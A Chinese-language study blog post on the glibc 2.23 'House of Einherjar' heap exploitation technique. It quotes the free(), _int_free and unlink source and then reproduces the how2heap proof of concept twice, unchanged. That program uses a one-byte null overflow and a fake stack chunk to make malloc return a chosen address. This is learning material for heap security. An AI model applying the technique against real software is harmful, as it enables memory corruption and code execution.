• 14号差不多了解了house of spirit的堆利用方法,现在就来学习house-of-einherjar的堆利用。
  • 在学习house of einherjar 之前,要先学习unlink的这个堆漏洞的利用,这样会对unlink的流程以及free()的过程会更加清晰。

前置知识

  • 之前学习了unlink技术,有一段时间没有做unlink的相关题型,所以先简单的总结一下unlink的过程,以及堆的前向合并以及后向和合并。并且重点强调堆中的隐式链表技术(该技术在house of spirit中有稍微提过一点)

  • 这里继续放出free()unlink的源码,接下来要看源码,理清一下free()的流程,这样有助于更好的学习house of spirit这个堆利用方式

free函数流程

  • 通过略读free函数,大概理清了free函数的具体流程

image-20250116221335784

image-20250116220931136

image-20250116220955481

free函数隐式链表技术

free函数相关源码

__libc_free源码

__libc_free
  • glibc2.23--malloc.c第2933行开始
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
void
__libc_free (void *mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */

void (*hook) (void *, const void *)
= atomic_forced_read (__free_hook);
if (__builtin_expect (hook != NULL, 0))
{
(*hook)(mem, RETURN_ADDRESS (0));
return;
}

if (mem == 0) /* free(0) has no effect */
return;

p = mem2chunk (mem);

if (chunk_is_mmapped (p)) /* release mmapped memory. */
{
/* see if the dynamic brk/mmap threshold needs adjusting */
if (!mp_.no_dyn_threshold
&& p->size > mp_.mmap_threshold
&& p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
{
mp_.mmap_threshold = chunksize (p);
mp_.trim_threshold = 2 * mp_.mmap_threshold;
LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
mp_.mmap_threshold, mp_.trim_threshold);
}
munmap_chunk (p);
return;
}

ar_ptr = arena_for_chunk (p);
_int_free (ar_ptr, p, 0);
}
libc_hidden_def (__libc_free)

_int_free源码

_int_free源码
  • glibc2.23--malloc.c第3836行开始
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
/*
------------------------------ free ------------------------------
*/

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
mchunkptr nextchunk; /* next contiguous chunk */
INTERNAL_SIZE_T nextsize; /* its size */
int nextinuse; /* true if nextchunk is used */
INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */
mchunkptr bck; /* misc temp for linking */
mchunkptr fwd; /* misc temp for linking */

const char *errstr = NULL;
int locked = 0;

size = chunksize (p);

/* Little security check which won't hurt performance: the
allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear
here by accident or by "design" from some intruder. */
if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
|| __builtin_expect (misaligned_chunk (p), 0))
{
errstr = "free(): invalid pointer";
errout:
if (!have_lock && locked)
(void) mutex_unlock (&av->mutex);
malloc_printerr (check_action, errstr, chunk2mem (p), av);
return;
}
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
{
errstr = "free(): invalid size";
goto errout;
}

check_inuse_chunk(av, p);

/*
If eligible, place chunk on a fastbin so it can be found
and used quickly in malloc.
*/

if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())

#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
) {

if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize (chunk_at_offset (p, size))
>= av->system_mem, 0))
{
/* We might not have a lock at this point and concurrent modifications
of system_mem might have let to a false positive. Redo the test
after getting the lock. */
if (have_lock
|| ({ assert (locked == 0);
mutex_lock(&av->mutex);
locked = 1;
chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
|| chunksize (chunk_at_offset (p, size)) >= av->system_mem;
}))
{
errstr = "free(): invalid next size (fast)";
goto errout;
}
if (! have_lock)
{
(void)mutex_unlock(&av->mutex);
locked = 0;
}
}

free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);

set_fastchunks(av);
unsigned int idx = fastbin_index(size);
fb = &fastbin (av, idx);

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;
unsigned int old_idx = ~0u;
do
{
/* Check that the top of the bin is not the record we are going to add
(i.e., double free). */
if (__builtin_expect (old == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}
/* Check that size of fastbin chunk at the top is the same as
size of the chunk that we are adding. We can dereference OLD
only if we have the lock, otherwise it might have already been
deallocated. See use of OLD_IDX below for the actual check. */
if (have_lock && old != NULL)
old_idx = fastbin_index(chunksize(old));
p->fd = old2 = old;
}
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
{
errstr = "invalid fastbin entry (free)";
goto errout;
}
}

/*
Consolidate other non-mmapped chunks as they arrive.
*/

else if (!chunk_is_mmapped(p)) {
if (! have_lock) {
(void)mutex_lock(&av->mutex);
locked = 1;
}

nextchunk = chunk_at_offset(p, size);

/* Lightweight tests: check whether the block is already the
top block. */
if (__glibc_unlikely (p == av->top))
{
errstr = "double free or corruption (top)";
goto errout;
}
/* Or whether the next chunk is beyond the boundaries of the arena. */
if (__builtin_expect (contiguous (av)
&& (char *) nextchunk
>= ((char *) av->top + chunksize(av->top)), 0))
{
errstr = "double free or corruption (out)";
goto errout;
}
/* Or whether the block is actually not marked used. */
if (__glibc_unlikely (!prev_inuse(nextchunk)))
{
errstr = "double free or corruption (!prev)";
goto errout;
}

nextsize = chunksize(nextchunk);
if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (nextsize >= av->system_mem, 0))
{
errstr = "free(): invalid next size (normal)";
goto errout;
}

free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);

/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(av, p, bck, fwd);
}

if (nextchunk != av->top) {
/* get and clear inuse bit */
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

/* consolidate forward */
if (!nextinuse) {
unlink(av, nextchunk, bck, fwd);
size += nextsize;
} else
clear_inuse_bit_at_offset(nextchunk, 0);

/*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
*/

bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
{
errstr = "free(): corrupted unsorted chunks";
goto errout;
}
p->fd = fwd;
p->bk = bck;
if (!in_smallbin_range(size))
{
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}
bck->fd = p;
fwd->bk = p;

set_head(p, size | PREV_INUSE);
set_foot(p, size);

check_free_chunk(av, p);
}

/*
If the chunk borders the current high end of memory,
consolidate into top
*/

else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
check_chunk(av, p);
}

/*
If freeing a large space, consolidate possibly-surrounding
chunks. Then, if the total unused topmost memory exceeds trim
threshold, ask malloc_trim to reduce top.

Unless max_fast is 0, we don't know if there are fastbins
bordering top, so we cannot tell for sure whether threshold
has been reached unless fastbins are consolidated. But we
don't want to consolidate on each free. As a compromise,
consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
is reached.
*/

if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
if (have_fastchunks(av))
malloc_consolidate(av);

if (av == &main_arena) {
#ifndef MORECORE_CANNOT_TRIM
if ((unsigned long)(chunksize(av->top)) >=
(unsigned long)(mp_.trim_threshold))
systrim(mp_.top_pad, av);
#endif
} else {
/* Always try heap_trim(), even if the top chunk is not
large, because the corresponding heap might go away. */
heap_info *heap = heap_for_ptr(top(av));

assert(heap->ar_ptr == av);
heap_trim(heap, mp_.top_pad);
}
}

if (! have_lock) {
assert (locked);
(void)mutex_unlock(&av->mutex);
}
}
/*
If the chunk was allocated via mmap, release via munmap().
*/

else {
munmap_chunk (p);
}
}

unlink源码

unlink宏定义
  • glibc2.23--malloc.c第1413行开始
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#define unlink(AV, P, BK, FD) {                                            \
FD = P->fd; \
BK = P->bk; \
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
else { \
FD->bk = BK; \
BK->fd = FD; \
if (!in_smallbin_range (P->size) \
&& __builtin_expect (P->fd_nextsize != NULL, 0)) { \
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \
|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \
malloc_printerr (check_action, \
"corrupted double-linked list (not small)", \
P, AV); \
if (FD->fd_nextsize == NULL) { \
if (P->fd_nextsize == P) \
FD->fd_nextsize = FD->bk_nextsize = FD; \
else { \
FD->fd_nextsize = P->fd_nextsize; \
FD->bk_nextsize = P->bk_nextsize; \
P->fd_nextsize->bk_nextsize = FD; \
P->bk_nextsize->fd_nextsize = FD; \
} \
} else { \
P->fd_nextsize->bk_nextsize = P->bk_nextsize; \
P->bk_nextsize->fd_nextsize = P->fd_nextsize; \
} \
} \
} \
}

其他源码

其他源码
  • glibc2.23--malloc.c第1303行获取size的值
1
#define chunksize(p)         ((p)->size & ~(SIZE_BITS))
  • glibc2.23--malloc.c第1219行,用于将free(addr)这个addr回退到chunk的头部而不是chunk中size之后的地址。
1
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))

实验

  • 这时how2heapglibc2.23house of einherjar.c的源码
源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
Credit to st4g3r for publishing this technique
The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak.
*/

int main()
{
setbuf(stdin, NULL);
setbuf(stdout, NULL);

printf("Welcome to House of Einherjar!\n");
printf("Tested in Ubuntu 16.04 64bit.\n");
printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

uint8_t* a;
uint8_t* b;
uint8_t* d;

printf("\nWe allocate 0x38 bytes for 'a'\n");
a = (uint8_t*) malloc(0x38);
printf("a: %p\n", a);

int real_a_size = malloc_usable_size(a);
printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

// create a fake chunk
printf("\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
printf("However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
printf("(although we could do the unsafe unlink technique here in some scenarios)\n");

size_t fake_chunk[6];

fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
fake_chunk[2] = (size_t) fake_chunk; // fwd
fake_chunk[3] = (size_t) fake_chunk; // bck
fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


printf("Our fake chunk at %p looks like:\n", fake_chunk);
printf("prev_size (not used): %#lx\n", fake_chunk[0]);
printf("size: %#lx\n", fake_chunk[1]);
printf("fwd: %#lx\n", fake_chunk[2]);
printf("bck: %#lx\n", fake_chunk[3]);
printf("fwd_nextsize: %#lx\n", fake_chunk[4]);
printf("bck_nextsize: %#lx\n", fake_chunk[5]);

/* In this case it is easier if the chunk size attribute has a least significant byte with
* a value of 0x00. The least significant byte of this will be 0x00, because the size of
* the chunk includes the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0xf8);
int real_b_size = malloc_usable_size(b);

printf("\nWe allocate 0xf8 bytes for 'b'.\n");
printf("b: %p\n", b);

uint64_t* b_size_ptr = (uint64_t*)(b - 8);
/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/

printf("\nb.size: %#lx\n", *b_size_ptr);
printf("b.size is: (0x100) | prev_inuse = 0x101\n");
printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0;
printf("b.size: %#lx\n", *b_size_ptr);
printf("This is easiest if b.size is a multiple of 0x100 so you "
"don't change the size of b, only its prev_inuse bit\n");
printf("If it had been modified, we would need a fake chunk inside "
"b where it will try to consolidate the next chunk\n");

// Write a fake prev_size to the end of a
printf("\nWe write a fake prev_size to the last %lu bytes of a so that "
"it will consolidate with our fake chunk\n", sizeof(size_t));
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
printf("Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

//Change the fake chunk's size to reflect b's new prev_size
printf("\nModify fake chunk's size to reflect b's new prev_size\n");
fake_chunk[1] = fake_size;

// free b and it will consolidate with our fake chunk
printf("Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
free(b);
printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

//if we allocate another chunk before we free b we will need to
//do two things:
//1) We will need to adjust the size of our fake chunk so that
//fake_chunk + fake_chunk's size points to an area we control
//2) we will need to write the size of our fake chunk
//at the location we control.
//After doing these two things, when unlink gets called, our fake chunk will
//pass the size(P) == prev_size(next_chunk(P)) test.
//otherwise we need to make sure that our fake chunk is up against the
//wilderness

printf("\nNow we can call malloc() and it will begin in our fake chunk\n");
d = malloc(0x200);
printf("Next malloc(0x200) is at %p\n", d);
}
  • 为了能认真让自己看一遍这个代码,我决定将汉化源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
Credit to st4g3r for publishing this technique
The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak.
*/

int main()
{
setbuf(stdin, NULL);
setbuf(stdout, NULL);

printf("Welcome to House of Einherjar!\n");
printf("Tested in Ubuntu 16.04 64bit.\n");
printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

uint8_t* a;
uint8_t* b;
uint8_t* d;

printf("\nWe allocate 0x38 bytes for 'a'\n");
a = (uint8_t*) malloc(0x38);
printf("a: %p\n", a);

int real_a_size = malloc_usable_size(a);
printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

// create a fake chunk
printf("\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
printf("However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
printf("(although we could do the unsafe unlink technique here in some scenarios)\n");

size_t fake_chunk[6];

fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
fake_chunk[2] = (size_t) fake_chunk; // fwd
fake_chunk[3] = (size_t) fake_chunk; // bck
fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


printf("Our fake chunk at %p looks like:\n", fake_chunk);
printf("prev_size (not used): %#lx\n", fake_chunk[0]);
printf("size: %#lx\n", fake_chunk[1]);
printf("fwd: %#lx\n", fake_chunk[2]);
printf("bck: %#lx\n", fake_chunk[3]);
printf("fwd_nextsize: %#lx\n", fake_chunk[4]);
printf("bck_nextsize: %#lx\n", fake_chunk[5]);

/* In this case it is easier if the chunk size attribute has a least significant byte with
* a value of 0x00. The least significant byte of this will be 0x00, because the size of
* the chunk includes the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0xf8);
int real_b_size = malloc_usable_size(b);

printf("\nWe allocate 0xf8 bytes for 'b'.\n");
printf("b: %p\n", b);

uint64_t* b_size_ptr = (uint64_t*)(b - 8);
/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/

printf("\nb.size: %#lx\n", *b_size_ptr);
printf("b.size is: (0x100) | prev_inuse = 0x101\n");
printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0;
printf("b.size: %#lx\n", *b_size_ptr);
printf("This is easiest if b.size is a multiple of 0x100 so you "
"don't change the size of b, only its prev_inuse bit\n");
printf("If it had been modified, we would need a fake chunk inside "
"b where it will try to consolidate the next chunk\n");

// Write a fake prev_size to the end of a
printf("\nWe write a fake prev_size to the last %lu bytes of a so that "
"it will consolidate with our fake chunk\n", sizeof(size_t));
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
printf("Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

//Change the fake chunk's size to reflect b's new prev_size
printf("\nModify fake chunk's size to reflect b's new prev_size\n");
fake_chunk[1] = fake_size;

// free b and it will consolidate with our fake chunk
printf("Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
free(b);
printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

//if we allocate another chunk before we free b we will need to
//do two things:
//1) We will need to adjust the size of our fake chunk so that
//fake_chunk + fake_chunk's size points to an area we control
//2) we will need to write the size of our fake chunk
//at the location we control.
//After doing these two things, when unlink gets called, our fake chunk will
//pass the size(P) == prev_size(next_chunk(P)) test.
//otherwise we need to make sure that our fake chunk is up against the
//wilderness

printf("\nNow we can call malloc() and it will begin in our fake chunk\n");
d = malloc(0x200);
printf("Next malloc(0x200) is at %p\n", d);
}